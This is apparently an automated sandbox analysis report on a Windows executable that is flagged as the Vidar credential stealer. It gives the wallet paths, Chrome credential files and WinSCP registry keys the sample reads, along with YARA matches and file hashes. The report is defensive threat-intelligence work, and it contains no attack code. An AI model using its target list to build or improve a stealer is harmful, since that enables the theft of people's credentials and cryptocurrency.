Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\?*U/
Source: 06625899.exe	String found in binary or memory: \Electrum\wallets\
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: 06625899.exe	String found in binary or memory: \Exodus\backups
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 06625899.exe	String found in binary or memory: Exodus Web3 Wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum"
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\?}
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

ID:	877001
Product:	CloudBasic
Start time:	10:45:08
Start date:	28.05.2023
Sample:	06625899.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	22cd094d925fb41f446ed4db24cc8c35
SHA1:	c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256:	9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\22919964096183665961703616	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4	4822E6A71C88A4AB8A27F90192B5A3B3	CC07E541426BFF64981CE6DE7D879306C716B6B9	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
C:\ProgramData\36067264576515806059430256	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2	CF7758A2FF4A94A5D589DEBAED38F82E	D3380E70D0CAEB9AD78D14DD970EA480E08232B8	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
C:\ProgramData\50764714324176067669882221	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4	4822E6A71C88A4AB8A27F90192B5A3B3	CC07E541426BFF64981CE6DE7D879306C716B6B9	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
C:\ProgramData\57469657185917597184786931	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17	DEE86123FE48584BA0CE07793E703560	E80D87A2E55A95BC937AC24525E51AE39D635EF7	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8

Windows Analysis Report
06625899.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report 06625899.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
06625899.exe

Malware Threat Intel
Provided by